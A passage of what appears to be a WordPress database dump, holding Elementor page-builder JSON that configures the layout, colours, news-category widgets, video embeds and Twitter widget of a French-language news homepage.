let\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1515,511,'_elementor_version','0.4'),(1516,511,'_elementor_css','a:3:{s:4:\"time\";i:1508927460;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1518,512,'_elementor_edit_mode','builder'),(1519,512,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"